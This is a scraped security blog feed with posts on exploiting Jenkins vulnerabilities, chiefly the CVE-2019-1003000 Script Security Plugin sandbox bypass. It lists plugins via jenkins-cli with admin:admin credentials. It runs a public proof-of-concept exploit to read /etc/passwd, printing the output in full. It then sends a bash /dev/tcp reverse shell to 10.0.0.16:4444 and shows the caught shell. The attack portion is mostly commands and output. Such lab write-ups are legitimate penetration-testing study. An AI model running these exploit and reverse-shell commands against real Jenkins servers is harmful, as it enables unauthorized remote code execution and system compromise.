<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">Jenkins - CVE</span></span><span style="color: #444444; font-family: times, times new roman, serif;">-2018-1000600 SSRF in GitHub plugin</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-exploits-pt2-cve.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-exploits-pt2-cve.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins - CVE-2019-1003000 Pt 1</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/03/jenkins-messing-with-exploits-pt3-cve.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/03/jenkins-messing-with-exploits-pt3-cve.html</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins - CVE-2019-1003000 Pt 2 - Orange Tsai exploit</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/03/jenkins-identify-ip-addresses-of-nodes.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/03/jenkins-identify-ip-addresses-of-nodes.html</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins - Identify IP Addresses of nodes</span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-86147936905173392022019-02-27T15:23:00.000-05:002019-02-27T20:26:57.124-05:00Jenkins - messing with exploits pt2 - CVE-2019-1003000<span style="color: #444444;">After the release of <a href="https://twitter.com/orange_8361/status/1097829220485496832" target="_blank">Orange Tsai's exploit</a> for Jenkins. I've been doing some poking. PreAuth RCE against Jenkins is something everyone wants.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">While not totally related to the blog post and tweet the following exploit came up while searching.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">What I have figured out that is important is the plug versions as it relates to these latest round of Jenkins exploits. TBH I never paid much attention to the plugins in the past as the issues have been with core Jenkins (as was the first blog post) but you can get a look at them by going to <span style="font-family: "courier new" , "courier" , monospace;">jenkins-server/pluginManager/installed</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5cOzbn6r1Hg80uzNmyu1N24lnNby6eO8cSDBctdGBbBRiJgfQuORsRiAqLiqlcRxDaGH8mBvwk2NuhE4PIlxSGFv-Mu2uqPij5mTmTF4i6W_G0v8IEpX6wjCwVQ4OHQg4fVhqrRsKa1g/s1600/Screen+Shot+2019-02-27+at+2.45.35+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444;"><img border="0" data-original-height="858" data-original-width="1600" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5cOzbn6r1Hg80uzNmyu1N24lnNby6eO8cSDBctdGBbBRiJgfQuORsRiAqLiqlcRxDaGH8mBvwk2NuhE4PIlxSGFv-Mu2uqPij5mTmTF4i6W_G0v8IEpX6wjCwVQ4OHQg4fVhqrRsKa1g/s400/Screen+Shot+2019-02-27+at+2.45.35+PM.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444;">Jenkins plugin manager</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;">It does require admin permissions or you get this:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSFxOoRL_xMEXml38voyG2NHMN9cKVaqPzzeWGyhVILoEdTTZTCX60DIT8xEanV4kq_snXeYXLA2B4LHv8s0ARluIU8wPLTY_wP1DREDlT7sbu1pf7V4sUk5DNXTqcnsEC2gt2EP226N4/s1600/Screen+Shot+2019-02-27+at+2.44.58+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="482" data-original-width="1490" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSFxOoRL_xMEXml38voyG2NHMN9cKVaqPzzeWGyhVILoEdTTZTCX60DIT8xEanV4kq_snXeYXLA2B4LHv8s0ARluIU8wPLTY_wP1DREDlT7sbu1pf7V4sUk5DNXTqcnsEC2gt2EP226N4/s400/Screen+Shot+2019-02-27+at+2.44.58+PM.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444;">No permissions for Jenkins plugin manager</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;">If you do have permissions you can also hit it with the jenkins-cli client and pull the info</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">$ java -jar jenkins-cli.jar -s http://10.0.0.166:8080/ -auth admin:admin list-plugins</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">jsch JSch dependency plugin 0.1.55</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">structs Structs Plugin 1.17</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">apache-httpcomponents-client-4-api Apache HttpComponents Client 4.x API Plugin 4.5.5-3.0</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">mailer Mailer Plugin 1.23</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">command-launcher Command Agent Launcher Plugin 1.3</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-api Pipeline: API 2.33</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-job Pipeline: Job 2.31</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">ssh-credentials SSH Credentials Plugin 1.14</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">authentication-tokens Authentication Tokens API Plugin 1.3</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-cps-global-lib Pipeline: Shared Groovy Libraries 2.13</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">jackson2-api Jackson 2 API Plugin 2.9.8</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-stage-tags-metadata Pipeline: Stage Tags Metadata 1.3.4.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-milestone-step Pipeline: Milestone Step 1.3.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">credentials Credentials Plugin 2.1.18</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">lockable-resources Lockable Resources plugin 2.4</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">jquery-detached JavaScript GUI Lib: jQuery bundles (jQuery and jQuery UI) plugin 1.2.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-scm-step Pipeline: SCM Step 2.7</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">matrix-auth Matrix Authorization Strategy Plugin 2.3</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">matrix-project Matrix Project Plugin 1.13</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-stage-step Pipeline: Stage Step 2.3</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-build-step Pipeline: Build Step 2.7</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-input-step Pipeline: Input Step 2.9</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">bouncycastle-api bouncycastle API Plugin 2.17</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">handlebars JavaScript GUI Lib: Handlebars bundle plugin 1.1.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">momentjs JavaScript GUI Lib: Moment.js bundle plugin 1.1.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">plain-credentials Plain Credentials Plugin 1.5</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">docker-commons Docker Commons Plugin 1.13</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">git-client Git client plugin 2.7.6</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-rest-api Pipeline: REST API Plugin 2.10</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-basic-steps Pipeline: Basic Steps 2.14</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">credentials-binding Credentials Binding Plugin 1.17 (1.18)</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-stage-view Pipeline: Stage View Plugin 2.10</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-multibranch Pipeline: Multibranch 2.20</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">script-security Script Security Plugin 1.49 (1.53)</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">git-server GIT server Plugin 1.7</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-step-api Pipeline: Step API 2.19</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-graph-analysis Pipeline Graph Analysis Plugin 1.9</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-model-api Pipeline: Model API 1.3.4.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-cps Pipeline: Groovy 2.61 (2.63)</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">branch-api Branch API Plugin 2.1.2</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">jdk-tool JDK Tool Plugin 1.2</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">cloudbees-folder Folders Plugin 6.7</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">durable-task Durable Task Plugin 1.29</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">junit JUnit Plugin 1.27</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">scm-api SCM API Plugin 2.3.0</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">ace-editor JavaScript GUI Lib: ACE Editor bundle plugin 1.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">display-url-api Display URL API 2.3.0</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-support Pipeline: Supporting APIs 3.2</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span></div>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">AFAIK you cant enumerate plugins installed and their version without (elevated) authentication like you can with things like WordPress. If you know how, please let me know. For the time being i guess it's just throwing things to see what sticks.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">As I mentioned, the latest particular vulns are issues with installed Jenkins plugins. Taking a look at CVE-2019-1003000 (<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-1003000" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2019-1003000</a>) we can see that it affects the Script Security Plugin (the nist.gov says 2.49 but it's a typo and should be 1.49) as seen on the Jenkins advisory <a href="https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266" target="_blank">https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266</a></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">An exploit for the issue exists and is available here: <a href="https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc" target="_blank">https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc</a> it even comes with a docker config to spin up a vulnerable version to try it out on. What's important about this particular exploit is that it IS post auth but it doesn't require script permissions, only Overall/Read permission and Job/Configure permissions.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">I'm seeing more and more servers/admins (rightfully) block access to the <span style="font-family: "courier new" , "courier" , monospace;">script</span> & <span style="font-family: "courier new" , "courier" , monospace;">scriptText </span>console because it's well documented that is an immediate RCE.</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIseUS_WxSJrn-6WQxlRQ0Pg84V7J0UG2xonbXs7t8O874FmNnGlVkWOjO-tSUkHUK8F06_S-t-PFq_-SMc43KDGmo0ncjJnbsUs26R6UVWqmqBElkhA0k8aeN8bnnscxpEmcGk6NPXGQ/s1600/Screen+Shot+2019-02-27+at+2.57.11+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444;"><img border="0" data-original-height="548" data-original-width="1572" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIseUS_WxSJrn-6WQxlRQ0Pg84V7J0UG2xonbXs7t8O874FmNnGlVkWOjO-tSUkHUK8F06_S-t-PFq_-SMc43KDGmo0ncjJnbsUs26R6UVWqmqBElkhA0k8aeN8bnnscxpEmcGk6NPXGQ/s400/Screen+Shot+2019-02-27+at+2.57.11+PM.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444;">no script permission</span></td></tr>
</tbody></table>
<span style="color: #444444;">I encourage you to read the whole readme file in the repo but the most important part is here:</span><br />
<span style="color: #444444;"><br /></span>
<blockquote class="tr_bq" style="background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<span style="color: #444444;">A flaw was found in Pipeline: Declarative Plugin before version 1.3.4.1, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50</span></blockquote>
<blockquote class="tr_bq" style="background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<span style="color: #444444;">This PoC is using a user with Overall/Read and Job/Configure permission to execute a maliciously modified build script in sandbox mode, and try to bypass the sandbox mode limitation in order to run arbitrary scripts (in this case, we will execute system command).</span></blockquote>
<blockquote class="tr_bq" style="background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<span style="color: #444444;">As a background, Jenkins's pipeline build script is written in groovy. This build script will be compiled and executed in Jenkins master or node, containing definition of the pipeline, e.g. what to do in slave nodes. Jenkins also provide the script to be executed in <em style="box-sizing: border-box;">sandbox mode</em>. In sandbox mode, all dangerous functions are blacklisted, so regular user cannot do anything malicious to the Jenkins server.</span></blockquote>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Running the exploit:</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] connecting to jenkins...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] crafting payload...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] modifying job with payload...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] putting job build to queue...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] waiting for job to build...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] restoring job...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] fetching output...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] OUTPUT:</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Started by user User 1</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Running in Durability level: MAX_SURVIVABILITY</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[Pipeline] echo</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">root:x:0:0:root:/root:/bin/ash</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bin:x:1:1:bin:/bin:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">daemon:x:2:2:daemon:/sbin:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">adm:x:3:4:adm:/var/adm:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sync:x:5:0:sync:/sbin:/bin/sync</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">halt:x:7:0:halt:/sbin:/sbin/halt</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">mail:x:8:12:mail:/var/spool/mail:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">news:x:9:13:news:/usr/lib/news:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">operator:x:11:0:operator:/root:/bin/sh</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">man:x:13:15:man:/usr/man:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">cron:x:16:16:cron:/var/spool/cron:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">ftp:x:21:21::/var/lib/ftp:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sshd:x:22:22:sshd:/dev/null:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">games:x:35:35:games:/usr/games:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">postgres:x:70:70::/var/lib/postgresql:/bin/sh</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">cyrus:x:85:12::/usr/cyrus:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">vpopmail:x:89:89::/var/vpopmail:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">ntp:x:123:123:NTP:/var/empty:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">guest:x:405:100:guest:/dev/null:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">nobody:x:65534:65534:nobody:/:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">jenkins:x:1000:1000:Linux User,,,:/var/jenkins_home:/bin/bash</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[Pipeline] End of Pipeline</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Finished: SUCCESS</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">you can certainly pull a reverse shell from it as well.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/10.0.0.16/4444 0>&1"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] connecting to jenkins...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] crafting payload...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] modifying job with payload...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] putting job build to queue...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] waiting for job to build...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] restoring job...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] fetching output...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] OUTPUT:</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Started by user User 1</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Running in Durability level: MAX_SURVIVABILITY</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: inherit;">and you get:</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">nc -l 4444 -vv</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash: cannot set terminal process group (7): Not a tty</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash: no job control in this shell</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.4$</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.4$</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.4$ whoami</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">whoami</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">jenkins</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"></span><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.4$</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
</span><br />
<span style="color: #444444;"><span style="font-family: inherit;">The TLDR is you can use this exploit to get a shell if an older version of the Script Security Plugin is installed and </span>if you have Overall/Read permission and Job/Configure permission <span style="font-family: inherit;">which a regular Jenkins user is more inclined to have and this exploit doesn't require using the script console.</span></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-39139468414223673562019-02-26T13:46:00.001-05:002019-02-28T10:43:04.167-05:00Jenkins - messing with new exploits pt1<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins notes for:</span><br />
<a href="https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html" target="_blank"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html</span></a><br />
<a href="http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" target="_blank"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html</span></a><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">to download old jenkins WAR files</span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: inherit;"><br /></span>
<a href="http://updates.jenkins-ci.org/download/war/" target="_blank">http://updates.jenkins-ci.org/download/war/</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">1st bug in the blog is a username enumeration bug in</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: inherit;"><br /></span>
</span><br />
<ul style="background-color: white; box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;">
<li style="box-sizing: border-box;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins weekly up to and including 2.145</span></li>
<li style="box-sizing: border-box;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins LTS up to and including 2.138.1</span></li>
</ul>
<div>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span></div>
<div>
<span style="color: #212529; font-family: "lato" , "roboto" , "open sans" , sans-serif;"><span style="color: #444444; font-family: "times" , "times new roman" , serif; font-size: 14px;">From the blog:</span></span></div>
<div>
<div style="background-color: white; box-sizing: border-box; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;">
<blockquote class="tr_bq">
